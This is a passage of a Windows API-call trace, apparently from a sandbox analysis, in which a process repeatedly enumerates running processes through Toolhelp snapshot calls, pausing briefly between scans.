th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0115.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0115.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0115.308] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0115.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0115.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0115.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0115.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0115.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0115.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.318] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0115.320] CloseHandle (hObject=0xc4) returned 1 [0115.320] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0115.354] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.358] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.365] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.366] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.367] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.368] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.369] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.370] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.370] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.385] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0115.399] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0115.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0115.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0115.455] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0115.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0115.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0115.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0115.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0115.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0115.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0115.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0115.466] CloseHandle (hObject=0xbc) returned 1 [0115.466] Sleep (dwMilliseconds=0x12c) [0115.860] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.865] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.875] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.876] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.876] Process32NextW (in: 